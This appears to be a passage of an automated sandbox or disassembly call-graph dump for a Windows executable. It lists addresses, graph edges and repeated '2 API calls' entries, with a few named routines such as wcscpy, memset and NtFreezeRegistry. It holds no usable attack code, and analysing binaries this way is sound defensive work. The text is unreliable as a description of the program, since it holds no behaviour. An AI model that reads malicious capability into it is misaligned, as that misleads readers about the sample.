7ff7f4f21394 2 API calls 3622->3624 3623->3622 3625 7ff7f4f21495 3624->3625 3626 7ff7f4f2149a 3625->3626 3627 7ff7f4f21394 2 API calls 3625->3627 3628 7ff7f4f21394 2 API calls 3626->3628 3627->3626 3629 7ff7f4f214a4 3628->3629 3630 7ff7f4f214a9 3629->3630 3631 7ff7f4f21394 2 API calls 3629->3631 3632 7ff7f4f21394 2 API calls 3630->3632 3631->3630 3633 7ff7f4f214b3 3632->3633 3634 7ff7f4f214b8 3633->3634 3635 7ff7f4f21394 2 API calls 3633->3635 3636 7ff7f4f21394 2 API calls 3634->3636 3635->3634 3637 7ff7f4f214c2 3636->3637 3638 7ff7f4f214c7 3637->3638 3639 7ff7f4f21394 2 API calls 3637->3639 3640 7ff7f4f21394 2 API calls 3638->3640 3639->3638 3641 7ff7f4f214d1 3640->3641 3642 7ff7f4f214d6 3641->3642 3643 7ff7f4f21394 2 API calls 3641->3643 3644 7ff7f4f21394 2 API calls 3642->3644 3643->3642 3645 7ff7f4f214e0 3644->3645 3646 7ff7f4f214e5 3645->3646 3647 7ff7f4f21394 2 API calls 3645->3647 3648 7ff7f4f21394 2 API calls 3646->3648 3647->3646 3649 7ff7f4f214ef 3648->3649 3650 7ff7f4f214f4 3649->3650 3651 7ff7f4f21394 2 API calls 3649->3651 3652 7ff7f4f21394 2 API calls 3650->3652 3651->3650 3653 7ff7f4f214fe 3652->3653 3654 7ff7f4f21394 2 API calls 3653->3654 3655 7ff7f4f21503 3654->3655 3656 7ff7f4f21394 2 API calls 3655->3656 3657 7ff7f4f21512 3656->3657 3658 7ff7f4f21394 2 API calls 3657->3658 3659 7ff7f4f21521 3658->3659 3660 7ff7f4f21530 3659->3660 3661 7ff7f4f21394 2 API calls 3659->3661 3662 7ff7f4f21394 2 API calls 3660->3662 3661->3660 3663 7ff7f4f2153a 3662->3663 3664 7ff7f4f2153f 3663->3664 3665 7ff7f4f21394 2 API calls 3663->3665 3666 7ff7f4f21394 2 API calls 3664->3666 3665->3664 3667 7ff7f4f2154e 3666->3667 3668 7ff7f4f21394 2 API calls 3667->3668 3669 7ff7f4f21558 3668->3669 3670 7ff7f4f2155d 3669->3670 3671 7ff7f4f21394 2 API calls 3669->3671 3672 7ff7f4f21394 2 API calls 3670->3672 3671->3670 3673 7ff7f4f21567 3672->3673 3674 7ff7f4f2156c 3673->3674 3675 7ff7f4f21394 2 API calls 3673->3675 3676 7ff7f4f21394 2 API calls 3674->3676 3675->3674 3677 7ff7f4f21576 3676->3677 3678 7ff7f4f2157b 3677->3678 3679 7ff7f4f21394 2 API calls 3677->3679 3680 7ff7f4f21394 2 API calls 3678->3680 3679->3678 3681 7ff7f4f21585 3680->3681 3682 7ff7f4f2158a 3681->3682 3683 7ff7f4f21394 2 API calls 3681->3683 3684 7ff7f4f21394 2 API calls 3682->3684 3683->3682 3685 7ff7f4f21599 3684->3685 3686 7ff7f4f21394 2 API calls 3685->3686 3687 7ff7f4f215a3 3686->3687 3688 7ff7f4f215a8 3687->3688 3689 7ff7f4f21394 2 API calls 3687->3689 3690 7ff7f4f21394 2 API calls 3688->3690 3689->3688 3691 7ff7f4f215b7 3690->3691 3692 7ff7f4f21394 2 API calls 3691->3692 3693 7ff7f4f215c1 3692->3693 3694 7ff7f4f215c6 3693->3694 3695 7ff7f4f21394 2 API calls 3693->3695 3696 7ff7f4f21394 2 API calls 3694->3696 3695->3694 3697 7ff7f4f215d0 3696->3697 3698 7ff7f4f215d5 3697->3698 3699 7ff7f4f21394 2 API calls 3697->3699 3700 7ff7f4f21394 2 API calls 3698->3700 3699->3698 3701 7ff7f4f215df 3700->3701 3702 7ff7f4f215e4 3701->3702 3703 7ff7f4f21394 2 API calls 3701->3703 3704 7ff7f4f21394 2 API calls 3702->3704 3703->3702 3705 7ff7f4f215f3 3704->3705 3705->3176 3706 7ff7f4f21404 3705->3706 3707 7ff7f4f21394 2 API calls 3706->3707 3708 7ff7f4f21413 3707->3708 3709 7ff7f4f21422 3708->3709 3710 7ff7f4f21394 2 API calls 3708->3710 3711 7ff7f4f21394 2 API calls 3709->3711 3710->3709 3712 7ff7f4f2142c 3711->3712 3713 7ff7f4f21431 3712->3713 3714 7ff7f4f21394 2 API calls 3712->3714 3715 7ff7f4f21394 2 API calls 3713->3715 3714->3713 3716 7ff7f4f2143b 3715->3716 3717 7ff7f4f21440 3716->3717 3718 7ff7f4f21394 2 API calls 3716->3718 3719 7ff7f4f21394 2 API calls 3717->3719 3718->3717 3720 7ff7f4f2144f 3719->3720 3721 7ff7f4f21394 2 API calls 3720->3721 3722 7ff7f4f21459 3721->3722 3723 7ff7f4f2145e 3722->3723 3724 7ff7f4f21394 2 API calls 3722->3724 3725 7ff7f4f21394 2 API calls 3723->3725 3724->3723 3726 7ff7f4f21468 3725->3726 3727 7ff7f4f2146d 3726->3727 3728 7ff7f4f21394 2 API calls 3726->3728 3729 7ff7f4f21394 2 API calls 3727->3729 3728->3727 3730 7ff7f4f21477 3729->3730 3731 7ff7f4f2147c 3730->3731 3732 7ff7f4f21394 2 API calls 3730->3732 3733 7ff7f4f21394 2 API calls 3731->3733 3732->3731 3734 7ff7f4f21486 3733->3734 3735 7ff7f4f2148b 3734->3735 3736 7ff7f4f21394 2 API calls 3734->3736 3737 7ff7f4f21394 2 API calls 3735->3737 3736->3735 3738 7ff7f4f21495 3737->3738 3739 7ff7f4f2149a 3738->3739 3740 7ff7f4f21394 2 API calls 3738->3740 3741 7ff7f4f21394 2 API calls 3739->3741 3740->3739 3742 7ff7f4f214a4 3741->3742 3743 7ff7f4f214a9 3742->3743 3744 7ff7f4f21394 2 API calls 3742->3744 3745 7ff7f4f21394 2 API calls 3743->3745 3744->3743 3746 7ff7f4f214b3 3745->3746 3747 7ff7f4f214b8 3746->3747 3748 7ff7f4f21394 2 API calls 3746->3748 3749 7ff7f4f21394 2 API calls 3747->3749 3748->3747 3750 7ff7f4f214c2 3749->3750 3751 7ff7f4f214c7 3750->3751 3752 7ff7f4f21394 2 API calls 3750->3752 3753 7ff7f4f21394 2 API calls 3751->3753 3752->3751 3754 7ff7f4f214d1 3753->3754 3755 7ff7f4f214d6 3754->3755 3756 7ff7f4f21394 2 API calls 3754->3756 3757 7ff7f4f21394 2 API calls 3755->3757 3756->3755 3758 7ff7f4f214e0 3757->3758 3759 7ff7f4f214e5 3758->3759 3760 7ff7f4f21394 2 API calls 3758->3760 3761 7ff7f4f21394 2 API calls 3759->3761 3760->3759 3762 7ff7f4f214ef 3761->3762 3763 7ff7f4f214f4 3762->3763 3764 7ff7f4f21394 2 API calls 3762->3764 3765 7ff7f4f21394 2 API calls 3763->3765 3764->3763 3766 7ff7f4f214fe 3765->3766 3767 7ff7f4f21394 2 API calls 3766->3767 3768 7ff7f4f21503 3767->3768 3769 7ff7f4f21394 2 API calls 3768->3769 3770 7ff7f4f21512 3769->3770 3771 7ff7f4f21394 2 API calls 3770->3771 3772 7ff7f4f21521 3771->3772 3773 7ff7f4f21530 3772->3773 3774 7ff7f4f21394 2 API calls 3772->3774 3775 7ff7f4f21394 2 API calls 3773->3775 3774->3773 3776 7ff7f4f2153a 3775->3776 3777 7ff7f4f2153f 3776->3777 3778 7ff7f4f21394 2 API calls 3776->3778 3779 7ff7f4f21394 2 API calls 3777->3779 3778->3777 3780 7ff7f4f2154e 3779->3780 3781 7ff7f4f21394 2 API calls 3780->3781 3782 7ff7f4f21558 3781->3782 3783 7ff7f4f2155d 3782->3783 3784 7ff7f4f21394 2 API calls 3782->3784 3785 7ff7f4f21394 2 API calls 3783->3785 3784->3783 3786 7ff7f4f21567 3785->3786 3787 7ff7f4f2156c 3786->3787 3788 7ff7f4f21394 2 API calls 3786->3788 3789 7ff7f4f21394 2 API calls 3787->3789 3788->3787 3790 7ff7f4f21576 3789->3790 3791 7ff7f4f2157b 3790->3791 3792 7ff7f4f21394 2 API calls 3790->3792 3793 7ff7f4f21394 2 API calls 3791->3793 3792->3791 3794 7ff7f4f21585 3793->3794 3795 7ff7f4f2158a 3794->3795 3796 7ff7f4f21394 2 API calls 3794->3796 3797 7ff7f4f21394 2 API calls 3795->3797 3796->3795 3798 7ff7f4f21599 3797->3798 3799 7ff7f4f21394 2 API calls 3798->3799 3800 7ff7f4f215a3 3799->3800 3801 7ff7f4f215a8 3800->3801 3802 7ff7f4f21394 2 API calls 3800->3802 3803 7ff7f4f21394 2 API calls 3801->3803 3802->3801 3804 7ff7f4f215b7 3803->3804 3805 7ff7f4f21394 2 API calls 3804->3805 3806 7ff7f4f215c1 3805->3806 3807 7ff7f4f215c6 3806->3807 3808 7ff7f4f21394 2 API calls 3806->3808 3809 7ff7f4f21394 2 API calls 3807->3809 3808->3807 3810 7ff7f4f215d0 3809->3810 3811 7ff7f4f215d5 3810->3811 3812 7ff7f4f21394 2 API calls 3810->3812 3813 7ff7f4f21394 2 API calls 3811->3813 3812->3811 3814 7ff7f4f215df 3813->3814 3815 7ff7f4f215e4 3814->3815 3816 7ff7f4f21394 2 API calls 3814->3816 3817 7ff7f4f21394 2 API calls 3815->3817 3816->3815 3818 7ff7f4f215f3 3817->3818 3818->3180 3820 7ff7f4f21394 2 API calls 3819->3820 3821 7ff7f4f21585 3820->3821 3822 7ff7f4f2158a 3821->3822 3823 7ff7f4f21394 2 API calls 3821->3823 3824 7ff7f4f21394 2 API calls 3822->3824 3823->3822 3825 7ff7f4f21599 3824->3825 3826 7ff7f4f21394 2 API calls 3825->3826 3827 7ff7f4f215a3 3826->3827 3828 7ff7f4f215a8 3827->3828 3829 7ff7f4f21394 2 API calls 3827->3829 3830 7ff7f4f21394 2 API calls 3828->3830 3829->3828 3831 7ff7f4f215b7 3830->3831 3832 7ff7f4f21394 2 API calls 3831->3832 3833 7ff7f4f215c1 3832->3833 3834 7ff7f4f215c6 3833->3834 3835 7ff7f4f21394 2 API calls 3833->3835 3836 7ff7f4f21394 2 API calls 3834->3836 3835->3834 3837 7ff7f4f215d0 3836->3837 3838 7ff7f4f215d5 3837->3838 3839 7ff7f4f21394 2 API calls 3837->3839 3840 7ff7f4f21394 2 API calls 3838->3840 3839->3838 3841 7ff7f4f215df 3840->3841 3842 7ff7f4f215e4 3841->3842 3843 7ff7f4f21394 2 API calls 3841->3843 3844 7ff7f4f21394 2 API calls 3842->3844 3843->3842 3845 7ff7f4f215f3 3844->3845 3845->3188 3846 7ff7f4f2158a 3845->3846 3847 7ff7f4f21394 2 API calls 3846->3847 3848 7ff7f4f21599 3847->3848 3849 7ff7f4f21394 2 API calls 3848->3849 3850 7ff7f4f215a3 3849->3850 3851 7ff7f4f215a8 3850->3851 3852 7ff7f4f21394 2 API calls 3850->3852 3853 7ff7f4f21394 2 API calls 3851->3853 3852->3851 3854 7ff7f4f215b7 3853->3854 3855 7ff7f4f21394 2 API calls 3854->3855 3856 7ff7f4f215c1 3855->3856 3857 7ff7f4f215c6 3856->3857 3858 7ff7f4f21394 2 API calls 3856->3858 3859 7ff7f4f21394 2 API calls 3857->3859 3858->3857 3860 7ff7f4f215d0 3859->3860 3861 7ff7f4f215d5 3860->3861 3862 7ff7f4f21394 2 API calls 3860->3862 3863 7ff7f4f21394 2 API calls 3861->3863 3862->3861 3864 7ff7f4f215df 3863->3864 3865 7ff7f4f215e4 3864->3865 3866 7ff7f4f21394 2 API calls 3864->3866 3867 7ff7f4f21394 2 API calls 3865->3867 3866->3865 3868 7ff7f4f215f3 3867->3868 3868->3188 3870 7ff7f4f21394 2 API calls 3869->3870 3871 7ff7f4f215f3 3870->3871 3871->3192 3873 7ff7f4f22f88 3872->3873 3874 7ff7f4f214a9 2 API calls 3873->3874 3875 7ff7f4f22fd0 3874->3875 3875->3202 3877 7ff7f4f22690 10 API calls 3876->3877 3878 7ff7f4f2392e 3877->3878 3879 7ff7f4f214a9 2 API calls 3878->3879 3898 7ff7f4f23b31 3878->3898 3880 7ff7f4f23977 3879->3880 3887 7ff7f4f23b38 3880->3887 4463 7ff7f4f214b8 3880->4463 3883 7ff7f4f23a97 memset 4541 7ff7f4f2148b 3883->4541 3886 7ff7f4f214b8 2 API calls 3888 7ff7f4f2399f 3886->3888 4790 7ff7f4f215c6 3887->4790 3888->3883 3888->3886 4534 7ff7f4f215d5 3888->4534 3892 7ff7f4f214b8 2 API calls 3893 7ff7f4f23b17 3892->3893 3893->3887 3894 7ff7f4f23b1b 3893->3894 4703 7ff7f4f2147c 3894->4703 3897 7ff7f4f2145e 2 API calls 3897->3898 3899 7ff7f4f214c7 3898->3899 3900 7ff7f4f21394 2 API calls 3899->3900 3901 7ff7f4f214d1 3900->3901 3902 7ff7f4f214d6 3901->3902 3903 7ff7f4f21394 2 API calls 3901->3903 3904 7ff7f4f21394 2 API calls 3902->3904 3903->3902 3905 7ff7f4f214e0 3904->3905 3906 7ff7f4f214e5 3905->3906 3907 7ff7f4f21394 2 API calls 3905->3907 3908 7ff7f4f21394 2 API calls 3906->3908 3907->3906 3909 7ff7f4f214ef 3908->3909 3910 7ff7f4f214f4 3909->3910 3911 7ff7f4f21394 2 API calls 3909->3911 3912 7ff7f4f21394 2 API calls 3910->3912 3911->3910 3913 7ff7f4f214fe 3912->3913 3914 7ff7f4f21394 2 API calls 3913->3914 3915 7ff7f4f21503 3914->3915 3916 7ff7f4f21394 2 API calls 3915->3916 3917 7ff7f4f21512 3916->3917 3918 7ff7f4f21394 2 API calls 3917->3918 3919 7ff7f4f21521 3918->3919 3920 7ff7f4f21530 3919->3920 3921 7ff7f4f21394 2 API calls 3919->3921 3922 7ff7f4f21394 2 API calls 3920->3922 3921->3920 3923 7ff7f4f2153a 3922->3923 3924 7ff7f4f2153f 3923->3924 3925 7ff7f4f21394 2 API calls 3923->3925 3926 7ff7f4f21394 2 API calls 3924->3926 3925->3924 3927 7ff7f4f2154e 3926->3927 3928 7ff7f4f21394 2 API calls 3927->3928 3929 7ff7f4f21558 3928->3929 3930 7ff7f4f2155d 3929->3930 3931 7ff7f4f21394 2 API calls 3929->3931 3932 7ff7f4f21394 2 API calls 3930->3932 3931->3930 3933 7ff7f4f21567 3932->3933 3934 7ff7f4f2156c 3933->3934 3935 7ff7f4f21394 2 API calls 3933->3935 3936 7ff7f4f21394 2 API calls 3934->3936 3935->3934 3937 7ff7f4f21576 3936->3937 3938 7ff7f4f2157b 3937->3938 3939 7ff7f4f21394 2 API calls 3937->3939 3940 7ff7f4f21394 2 API calls 3938->3940 3939->3938 3941 7ff7f4f21585 3940->3941 3942 7ff7f4f2158a 3941->3942 3943 7ff7f4f21394 2 API calls 3941->3943 3944 7ff7f4f21394 2 API calls 3942->3944 3943->3942 3945 7ff7f4f21599 3944->3945 3946 7ff7f4f21394 2 API calls 3945->3946 3947 7ff7f4f215a3 3946->3947 3948 7ff7f4f215a8 3947->3948 3949 7ff7f4f21394 2 API calls 3947->3949 3950 7ff7f4f21394 2 API calls 3948->3950 3949->3948 3951 7ff7f4f215b7 3950->3951 3952 7ff7f4f21394 2 API calls 3951->3952 3953 7ff7f4f215c1 3952->3953 3954 7ff7f4f215c6 3953->3954 3955 7ff7f4f21394 2 API calls 3953->3955 3956 7ff7f4f21394 2 API calls 3954->3956 3955->3954 3957 7ff7f4f215d0 3956->3957 3958 7ff7f4f215d5 3957->3958 3959 7ff7f4f21394 2 API calls 3957->3959 3960 7ff7f4f21394 2 API calls 3958->3960 3959->3958 3961 7ff7f4f215df 3960->3961 3962 7ff7f4f215e4 3961->3962 3963 7ff7f4f21394 2 API calls 3961->3963 3964 7ff7f4f21394 2 API calls 3962->3964 3963->3962 3965 7ff7f4f215f3 3964->3965 3965->3207 3965->3208 3967 7ff7f4f21394 2 API calls 3966->3967 3968 7ff7f4f215b7 3967->3968 3969 7ff7f4f21394 2 API calls 3968->3969 3970 7ff7f4f215c1 3969->3970 3971 7ff7f4f215c6 3970->3971 3972 7ff7f4f21394 2 API calls 3970->3972 3973 7ff7f4f21394 2 API calls 3971->3973 3972->3971 3974 7ff7f4f215d0 3973->3974 3975 7ff7f4f215d5 3974->3975 3976 7ff7f4f21394 2 API calls 3974->3976 3977 7ff7f4f21394 2 API calls 3975->3977 3976->3975 3978 7ff7f4f215df 3977->3978 3979 7ff7f4f215e4 3978->3979 3980 7ff7f4f21394 2 API calls 3978->3980 3981 7ff7f4f21394 2 API calls 3979->3981 3980->3979 3982 7ff7f4f215f3 3981->3982 3982->3221 3982->3222 3984 7ff7f4f21394 2 API calls 3983->3984 3985 7ff7f4f2153a 3984->3985 3986 7ff7f4f2153f 3985->3986 3987 7ff7f4f21394 2 API calls 3985->3987 3988 7ff7f4f21394 2 API calls 3986->3988 3987->3986 3989 7ff7f4f2154e 3988->3989 3990 7ff7f4f21394 2 API calls 3989->3990 3991 7ff7f4f21558 3990->3991 3992 7ff7f4f2155d 3991->3992 3993 7ff7f4f21394 2 API calls 3991->3993 3994 7ff7f4f21394 2 API calls 3992->3994 3993->3992 3995 7ff7f4f21567 3994->3995 3996 7ff7f4f2156c 3995->3996 3997 7ff7f4f21394 2 API calls 3995->3997 3998 7ff7f4f21394 2 API calls 3996->3998 3997->3996 3999 7ff7f4f21576 3998->3999 4000 7ff7f4f2157b 3999->4000 4001 7ff7f4f21394 2 API calls 3999->4001 4002 7ff7f4f21394 2 API calls 4000->4002 4001->4000 4003 7ff7f4f21585 4002->4003 4004 7ff7f4f2158a 4003->4004 4005 7ff7f4f21394 2 API calls 4003->4005 4006 7ff7f4f21394 2 API calls 4004->4006 4005->4004 4007 7ff7f4f21599 4006->4007 4008 7ff7f4f21394 2 API calls 4007->4008 4009 7ff7f4f215a3 4008->4009 4010 7ff7f4f215a8 4009->4010 4011 7ff7f4f21394 2 API calls 4009->4011 4012 7ff7f4f21394 2 API calls 4010->4012 4011->4010 4013 7ff7f4f215b7 4012->4013 4014 7ff7f4f21394 2 API calls 4013->4014 4015 7ff7f4f215c1 4014->4015 4016 7ff7f4f215c6 4015->4016 4017 7ff7f4f21394 2 API calls 4015->4017 4018 7ff7f4f21394 2 API calls 4016->4018 4017->4016 4019 7ff7f4f215d0 4018->4019 4020 7ff7f4f215d5 4019->4020 4021 7ff7f4f21394 2 API calls 4019->4021 4022 7ff7f4f21394 2 API calls 4020->4022 4021->4020 4023 7ff7f4f215df 4022->4023 4024 7ff7f4f215e4 4023->4024 4025 7ff7f4f21394 2 API calls 4023->4025 4026 7ff7f4f21394 2 API calls 4024->4026 4025->4024 4027 7ff7f4f215f3 4026->4027 4027->3245 4027->3246 4029 7ff7f4f21394 2 API calls 4028->4029 4030 7ff7f4f214b3 4029->4030 4031 7ff7f4f214b8 4030->4031 4032 7ff7f4f21394 2 API calls 4030->4032 4033 7ff7f4f21394 2 API calls 4031->4033 4032->4031 4034 7ff7f4f214c2 4033->4034 4035 7ff7f4f214c7 4034->4035 4036 7ff7f4f21394 2 API calls 4034->4036 4037 7ff7f4f21394 2 API calls 4035->4037 4036->4035 4038 7ff7f4f214d1 4037->4038 4039 7ff7f4f214d6 4038->4039 4040 7ff7f4f21394 2 API calls 4038->4040 4041 7ff7f4f21394 2 API calls 4039->4041 4040->4039 4042 7ff7f4f214e0 4041->4042 4043 7ff7f4f214e5 4042->4043 4044 7ff7f4f21394 2 API calls 4042->4044 4045 7ff7f4f21394 2 API calls 4043->4045 4044->4043 4046 7ff7f4f214ef 4045->4046 4047 7ff7f4f214f4 4046->4047 4048 7ff7f4f21394 2 API calls 4046->4048 4049 7ff7f4f21394 2 API calls 4047->4049 4048->4047 4050 7ff7f4f214fe 4049->4050 4051 7ff7f4f21394 2 API calls 4050->4051 4052 7ff7f4f21503 4051->4052 4053 7ff7f4f21394 2 API calls 4052->4053 4054 7ff7f4f21512 4053->4054 4055 7ff7f4f21394 2 API calls 4054->4055 4056 7ff7f4f21521 4055->4056 4057 7ff7f4f21530 4056->4057 4058 7ff7f4f21394 2 API calls 4056->4058 4059 7ff7f4f21394 2 API calls 4057->4059 4058->4057 4060 7ff7f4f2153a 4059->4060 4061 7ff7f4f2153f 4060->4061 4062 7ff7f4f21394 2 API calls 4060->4062 4063 7ff7f4f21394 2 API calls 4061->4063 4062->4061 4064 7ff7f4f2154e 4063->4064 4065 7ff7f4f21394 2 API calls 4064->4065 4066 7ff7f4f21558 4065->4066 4067 7ff7f4f2155d 4066->4067 4068 7ff7f4f21394 2 API calls 4066->4068 4069 7ff7f4f21394 2 API calls 4067->4069 4068->4067 4070 7ff7f4f21567 4069->4070 4071 7ff7f4f2156c 4070->4071 4072 7ff7f4f21394 2 API calls 4070->4072 4073 7ff7f4f21394 2 API calls 4071->4073 4072->4071 4074 7ff7f4f21576 4073->4074 4075 7ff7f4f2157b 4074->4075 4076 7ff7f4f21394 2 API calls 4074->4076 4077 7ff7f4f21394 2 API calls 4075->4077 4076->4075 4078 7ff7f4f21585 4077->4078 4079 7ff7f4f2158a 4078->4079 4080 7ff7f4f21394 2 API calls 4078->4080 4081 7ff7f4f21394 2 API calls 4079->4081 4080->4079 4082 7ff7f4f21599 4081->4082 4083 7ff7f4f21394 2 API calls 4082->4083 4084 7ff7f4f215a3 4083->4084 4085 7ff7f4f215a8 4084->4085 4086 7ff7f4f21394 2 API calls 4084->4086 4087 7ff7f4f21394 2 API calls 4085->4087 4086->4085 4088 7ff7f4f215b7 4087->4088 4089 7ff7f4f21394 2 API calls 4088->4089 4090 7ff7f4f215c1 4089->4090 4091 7ff7f4f215c6 4090->4091 4092 7ff7f4f21394 2 API calls 4090->4092 4093 7ff7f4f21394 2 API calls 4091->4093 4092->4091 4094 7ff7f4f215d0 4093->4094 4095 7ff7f4f215d5 4094->4095 4096 7ff7f4f21394 2 API calls 4094->4096 4097 7ff7f4f21394 2 API calls 4095->4097 4096->4095 4098 7ff7f4f215df 4097->4098 4099 7ff7f4f215e4 4098->4099 4100 7ff7f4f21394 2 API calls 4098->4100 4101 7ff7f4f21394 2 API calls 4099->4101 4100->4099 4102 7ff7f4f215f3 4101->4102 4102->3255 4103 7ff7f4f21440 4102->4103 4104 7ff7f4f21394 2 API calls 4103->4104 4105 7ff7f4f2144f 4104->4105 4106 7ff7f4f21394 2 API calls 4105->4106 4107 7ff7f4f21459 4106->4107 4108 7ff7f4f2145e 4107->4108 4109 7ff7f4f21394 2 API calls 4107->4109 4110 7ff7f4f21394 2 API calls 4108->4110 4109->4108 4111 7ff7f4f21468 4110->4111 4112 7ff7f4f2146d 4111->4112 4113 7ff7f4f21394 2 API calls 4111->4113 4114 7ff7f4f21394 2 API calls 4112->4114 4113->4112 4115 7ff7f4f21477 4114->4115 4116 7ff7f4f2147c 4115->4116 4117 7ff7f4f21394 2 API calls 4115->4117 4118 7ff7f4f21394 2 API calls 4116->4118 4117->4116 4119 7ff7f4f21486 4118->4119 4120 7ff7f4f2148b 4119->4120 4121 7ff7f4f21394 2 API calls 4119->4121 4122 7ff7f4f21394 2 API calls 4120->4122 4121->4120 4123 7ff7f4f21495 4122->4123 4124 7ff7f4f2149a 4123->4124 4125 7ff7f4f21394 2 API calls 4123->4125 4126 7ff7f4f21394 2 API calls 4124->4126 4125->4124 4127 7ff7f4f214a4 4126->4127 4128 7ff7f4f214a9 4127->4128 4129 7ff7f4f21394 2 API calls 4127->4129 4130 7ff7f4f21394 2 API calls 4128->4130 4129->4128 4131 7ff7f4f214b3 4130->4131 4132 7ff7f4f214b8 4131->4132 4133 7ff7f4f21394 2 API calls 4131->4133 4134 7ff7f4f21394 2 API calls 4132->4134 4133->4132 4135 7ff7f4f214c2 4134->4135 4136 7ff7f4f214c7 4135->4136 4137 7ff7f4f21394 2 API calls 4135->4137 4138 7ff7f4f21394 2 API calls 4136->4138 4137->4136 4139 7ff7f4f214d1 4138->4139 4140 7ff7f4f214d6 4139->4140 4141 7ff7f4f21394 2 API calls 4139->4141 4142 7ff7f4f21394 2 API calls 4140->4142 4141->4140 4143 7ff7f4f214e0 4142->4143 4144 7ff7f4f214e5 4143->4144 4145 7ff7f4f21394 2 API calls 4143->4145 4146 7ff7f4f21394 2 API calls 4144->4146 4145->4144 4147 7ff7f4f214ef 4146->4147 4148 7ff7f4f214f4 4147->4148 4149 7ff7f4f21394 2 API calls 4147->4149 4150 7ff7f4f21394 2 API calls 4148->4150 4149->4148 4151 7ff7f4f214fe 4150->4151 4152 7ff7f4f21394 2 API calls 4151->4152 4153 7ff7f4f21503 4152->4153 4154 7ff7f4f21394 2 API calls 4153->4154 4155 7ff7f4f21512 4154->4155 4156 7ff7f4f21394 2 API calls 4155->4156 4157 7ff7f4f21521 4156->4157 4158 7ff7f4f21530 4157->4158 4159 7ff7f4f21394 2 API calls 4157->4159 4160 7ff7f4f21394 2 API calls 4158->4160 4159->4158 4161 7ff7f4f2153a 4160->4161 4162 7ff7f4f2153f 4161->4162 4163 7ff7f4f21394 2 API calls 4161->4163 4164 7ff7f4f21394 2 API calls 4162->4164 4163->4162 4165 7ff7f4f2154e 4164->4165 4166 7ff7f4f21394 2 API calls 4165->4166 4167 7ff7f4f21558 4166->4167 4168 7ff7f4f2155d 4167->4168 4169 7ff7f4f21394 2 API calls 4167->4169 4170 7ff7f4f21394 2 API calls 4168->4170 4169->4168 4171 7ff7f4f21567 4170->4171 4172 7ff7f4f2156c 4171->4172 4173 7ff7f4f21394 2 API calls 4171->4173 4174 7ff7f4f21394 2 API calls 4172->4174 4173->4172 4175 7ff7f4f21576 4174->4175 4176 7ff7f4f2157b 4175->4176 4177 7ff7f4f21394 2 API calls 4175->4177 4178 7ff7f4f21394 2 API calls 4176->4178 4177->4176 4179 7ff7f4f21585 4178->4179 4180 7ff7f4f2158a 4179->4180 4181 7ff7f4f21394 2 API calls 4179->4181 4182 7ff7f4f21394 2 API calls 4180->4182 4181->4180 4183 7ff7f4f21599 4182->4183 4184 7ff7f4f21394 2 API calls 4183->4184 4185 7ff7f4f215a3 4184->4185 4186 7ff7f4f215a8 4185->4186 4187 7ff7f4f21394 2 API calls 4185->4187 4188 7ff7f4f21394 2 API calls 4186->4188 4187->4186 4189 7ff7f4f215b7 4188->4189 4190 7ff7f4f21394 2 API calls 4189->4190 4191 7ff7f4f215c1 4190->4191 4192 7ff7f4f215c6 4191->4192 4193 7ff7f4f21394 2 API calls 4191->4193 4194 7ff7f4f21394 2 API calls 4192->4194 4193->4192 4195 7ff7f4f215d0 4194->4195 4196 7ff7f4f215d5 4195->4196 4197 7ff7f4f21394 2 API calls 4195->4197 4198 7ff7f4f21394 2 API calls 4196->4198 4197->4196 4199 7ff7f4f215df 4198->4199 4200 7ff7f4f215e4 4199->4200 4201 7ff7f4f21394 2 API calls 4199->4201 4202 7ff7f4f21394 2 API calls 4200->4202 4201->4200 4203 7ff7f4f215f3 4202->4203 4203->3255 4203->3266 4205 7ff7f4f235c1 memset 4204->4205 4214 7ff7f4f233c3 4204->4214 4208 7ff7f4f235e6 4205->4208 4206 7ff7f4f2343a memset 4206->4214 4207 7ff7f4f2362b wcscpy wcscat wcslen 4209 7ff7f4f21422 2 API calls 4207->4209 4208->4207 4213 7ff7f4f23728 4209->4213 4210 7ff7f4f23493 wcscpy wcscat wcslen 4801 7ff7f4f21422 4210->4801 4212 7ff7f4f23767 4212->3274 4213->4212 4910 7ff7f4f21431 4213->4910 4214->4205 4214->4206 4214->4210 4217 7ff7f4f2145e 2 API calls 4214->4217 4219 7ff7f4f23579 4214->4219 4217->4214 4218 7ff7f4f2145e 2 API calls 4218->4212 4219->4205 4224 7ff7f4f28240 4220->4224 4222 7ff7f4f213b8 4223 7ff7f4f213c6 NtFreezeRegistry 4222->4223 4223->3324 4225 7ff7f4f2825e 4224->4225 4228 7ff7f4f2828b 4224->4228 4225->4222 4226 7ff7f4f28333 4227 7ff7f4f2834f malloc 4226->4227 4229 7ff7f4f28370 4227->4229 4228->4225 4228->4226 4229->4225 4231 7ff7f4f2266f memset 4230->4231 4231->3547 4314 7ff7f4f2155d 4232->4314 4234 7ff7f4f227f4 4235 7ff7f4f214c7 2 API calls 4234->4235 4236 7ff7f4f22816 4235->4236 4240 7ff7f4f21503 2 API calls 4236->4240 4238 7ff7f4f22785 wcsncmp 4349 7ff7f4f214e5 4238->4349 4241 7ff7f4f2283d 4240->4241 4243 7ff7f4f22847 memset 4241->4243 4242 7ff7f4f22d27 4244 7ff7f4f22877 4243->4244 4245 7ff7f4f228bc wcscpy wcscat wcslen 4244->4245 4246 7ff7f4f2291a 4245->4246 4247 7ff7f4f228ee wcslen 4245->4247 4248 7ff7f4f22967 wcslen 4246->4248 4250 7ff7f4f22985 4246->4250 4247->4246 4248->4250 4249 7ff7f4f229d9 wcslen 4251 7ff7f4f214a9 2 API calls 4249->4251 4250->4242 4250->4249 4252 7ff7f4f22a73 4251->4252 4253 7ff7f4f214a9 2 API calls 4252->4253 4254 7ff7f4f22bd2 4253->4254 4408 7ff7f4f214f4 4254->4408 4257 7ff7f4f214c7 2 API calls 4258 7ff7f4f22c99 4257->4258 4259 7ff7f4f214c7 2 API calls 4258->4259 4260 7ff7f4f22cb1 4259->4260 4261 7ff7f4f2145e 2 API calls 4260->4261 4262 7ff7f4f22cbb 4261->4262 4263 7ff7f4f2145e 2 API calls 4262->4263 4264 7ff7f4f22cc5 4263->4264 4264->3545 4266 7ff7f4f21394 2 API calls 4265->4266 4267 7ff7f4f21521 4266->4267 4268 7ff7f4f21530 4267->4268 4269 7ff7f4f21394 2 API calls 4267->4269 4270 7ff7f4f21394 2 API calls 4268->4270 4269->4268 4271 7ff7f4f2153a 4270->4271 4272 7ff7f4f2153f 4271->4272 4273 7ff7f4f21394 2 API calls 4271->4273 4274 7ff7f4f21394 2 API calls 4272->4274 4273->4272 4275 7ff7f4f2154e 4274->4275 4276 7ff7f4f21394 2 API calls 4275->4276 4277 7ff7f4f21558 4276->4277 4278 